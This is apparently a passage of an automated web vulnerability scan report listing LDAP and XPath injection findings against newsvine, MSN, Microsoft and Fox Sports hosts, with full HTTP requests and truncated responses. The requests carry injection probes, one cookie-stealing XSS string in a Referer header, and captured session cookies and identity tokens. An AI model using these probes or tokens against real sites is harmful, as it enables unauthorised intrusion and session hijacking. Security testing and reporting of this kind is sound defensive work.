<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/
...[SNIP]...

2.26. http://www.polls.newsvine.com/_vine/js/pierre [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.polls.newsvine.com
Path:	/_vine/js/pierre

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads 3c3db971ca91afcd)(sn=* and 3c3db971ca91afcd)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_vine/3c3db971ca91afcd)(sn=*/pierre HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vid=55d515b4f7dadf9aee6395750020b187;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:23:23 GMT
Content-Length: 15041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=293363911&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=293363911&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com/_
...[SNIP]...

Request 2

GET /_vine/3c3db971ca91afcd)!(sn=*/pierre HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vid=55d515b4f7dadf9aee6395750020b187;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:23:23 GMT
Content-Length: 15051
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<script language="javascript" type="text/javascript">var imgsrc = "?&ad=1:1:81;44::";imgsrc += "&x=0|26&get=error-page&rand=2033081145&do=newsvine.com";if(document.referrer) imgsrc += "&rf="+escape(document.referrer);document.write('<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif'+imgsrc+'" alt="" width="0" height="0" /></div>');</script><noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?&ad=1:1:81;44::&x=0|26&get=error-page&rand=2033081145&do=newsvine.com" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine_template_error_Error">
<div id="header_grid"><div id="header_main"><div id="header"><div id="toplogo"><a href="http://www.polls.newsvine.com"><img src="http://www.polls.newsvine.com/_vine/images/__/blank.gif" width="162" height="32" alt="Newsvine" /></a></div><div class="header_searchBox"><form class="header_searchForm" method="get" action="http://www.polls.newsvine.com/_vine/search"><label>Search:</label><input type="text" class="query" name="q" value="" /><input type="hidden" name="sa" value="Search">
<input type="hidden" name="cx" value="012943277593349087480:xx9wfuef0se">
<input type="hidden" name="cof" value="FORID:11">
<select name="searchIn"><option value="t">Tags</option><option value="x" selected="selected">Full Text</option><option value="u">Users</option></select><input type="submit" name="goButton" value="Go" /></form></div><ul id="reportabug"><li><a href="http://www.polls.newsvine.com/_nv/cms/welcome"><img src="http://www.polls.newsvine.com/_vine/images/__/b_welcome.gif" width="41" height="19" alt="Welcome" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/help/faq"><img src="http://www.polls.newsvine.com/_vine/images/__/b_help.gif" width="41" height="19" alt="Help" /></a></li><li><a href="http://www.polls.newsvine.com/_nv/cms/info/contact"><img src="http://www.polls.newsvine.com/_vine/images/__/b_reportbug.gif" width="41" height="26" alt="Report Bug" /></a></li></ul><div id="convTracker"><ul><li id="convTracker_label"><img src="http://www.polls.newsvine.com
...[SNIP]...

3. XPath injection previous next
There are 11 instances of this issue:

http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js [REST URL parameter 3]
http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js [REST URL parameter 3]
http://blogs.silverlight.net/ScriptResource.axd [d parameter]
http://blogs.silverlight.net/ScriptResource.axd [name of an arbitrarily supplied request parameter]
http://blogs.silverlight.net/ScriptResource.axd [t parameter]
http://entertainment.redacted/news/ [REST URL parameter 1]
http://entertainment.redacted/video/ [REST URL parameter 1]
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [Referer HTTP header]
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [User-Agent HTTP header]
http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]
http://silverlight.codeplex.com/ [name of an arbitrarily supplied request parameter]

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

3.1. http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ajax.microsoft.com
Path:	/ajax/jQuery/jquery-1.3.2.min.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ajax/jQuery/jquery-1.3.2.min.js' HTTP/1.1
Host: ajax.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791954442400000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:22:15 GMT
Content-Length: 32230
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
</strong>", releaseUrl: ajaxPath + "<strong>
...[SNIP]...

3.2. http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ajax.microsoft.com
Path:	/ajax/jQuery/jquery-1.4.2.min.js

Issue detail

Request

GET /ajax/jQuery/jquery-1.4.2.min.js' HTTP/1.1
Host: ajax.microsoft.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 791805141200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:52:30 GMT
Content-Length: 32329
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
</strong>", releaseUrl: ajaxPath + "<strong>
...[SNIP]...

3.3. http://blogs.silverlight.net/ScriptResource.axd [d parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://blogs.silverlight.net
Path:	/ScriptResource.axd

Issue detail

The d parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the d parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1'&t=ffffffffbcc66b6e HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Sun, 29 Jan 2012 20:51:02 GMT
Last-Modified: Sat, 29 Jan 2011 20:51:02 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:28:36 GMT
Content-Length: 99448

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...
<f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this);
...[SNIP]...

3.4. http://blogs.silverlight.net/ScriptResource.axd [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://blogs.silverlight.net
Path:	/ScriptResource.axd

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1&t=ffffffffbcc66b6e&1'=1 HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Sun, 29 Jan 2012 23:26:23 GMT
Last-Modified: Sat, 29 Jan 2011 23:26:23 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:30:23 GMT
Content-Length: 99448

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...
<f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this);
...[SNIP]...

3.5. http://blogs.silverlight.net/ScriptResource.axd [t parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://blogs.silverlight.net
Path:	/ScriptResource.axd

Issue detail

The t parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the t parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ScriptResource.axd?d=1kuLgEePUyZ5x1vAYc1EW-Krk0cguDDpiLsIYXXse8b0tAH0cpYYGD5goVWcKW0gReQra4IS5Zd75XKfurjglj0xejELjy__-RPRrABGk9h12y8wRirPHf5b2XtUjrv_5nimQtGfCP78kkUcYuOKnTR1iag1&t=ffffffffbcc66b6e' HTTP/1.1
Host: blogs.silverlight.net
Proxy-Connection: keep-alive
Referer: http://blogs.silverlight.net/showcasehosted/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=h3hgjfvrlb5fxhy1wldldh45; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:22:47 GMT; CSAnonymous=8ce40bcc-0dd0-4189-9444-945ad399b48e

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Sun, 29 Jan 2012 23:26:23 GMT
Last-Modified: Sat, 29 Jan 2011 23:26:23 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:28:37 GMT
Content-Length: 99448

...//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//----------------------------------------------------------
// Microsof
...[SNIP]...
<f;b++)try{var a=new ActiveXObject(c[b]);a.async=false;a.loadXML(d);a.setProperty("SelectionLanguage","XPath");return a}catch(g){}}else try{var e=new window.DOMParser;return e.parseFromString(d,"text/xml")}catch(g){}return null};Sys.Net.XMLHttpExecutor=function(){Sys.Net.XMLHttpExecutor.initializeBase(this);
...[SNIP]...

3.6. http://entertainment.redacted/news/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /news'/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53218
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=7fabc37e939249ca90d016d1c2d17f62; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3.7. http://entertainment.redacted/video/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

Request

GET /video'/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 53218
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=6d4eeafde5e747ca8079be903574a601; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Celebrity
...[SNIP]...
, feedVal, cssItem, cssCell4) { if(typeof feedVal == "undefined"){ feedTimeout = setTimeout(getNews,1000); } else{ var item = new XmlListItem(); item.dataXpath = "channel/item"; item.css = cssItem; linkOpen = "new"; item.link = "link"; item.linkXpath = "link"; if (!item.cells) item.cells = new Array();
...[SNIP]...

3.8. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://msn.foxsports.com
Path:	/cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248777
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript" src="http://static.foxsports.com/cgi-bin/merge?files=/fe/js/spry/xpath.js,/fe/js/spry/SpryData.js,/fe/js/spry/SpryEffects.js,/fe/js/spry/SpryNestedXMLDataSet.js,/fe/js/spry/SpryDOMUtils.js,/fe/js/jQuery/jquery-1.3.min.js,/fe/js/jQuery/plugins/easySlider1.7.js,/fe/js/SWF/
...[SNIP]...

3.9. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://msn.foxsports.com
Path:	/cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response (redirected)

3.10. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://msn.foxsports.com
Path:	/cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175?1'=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
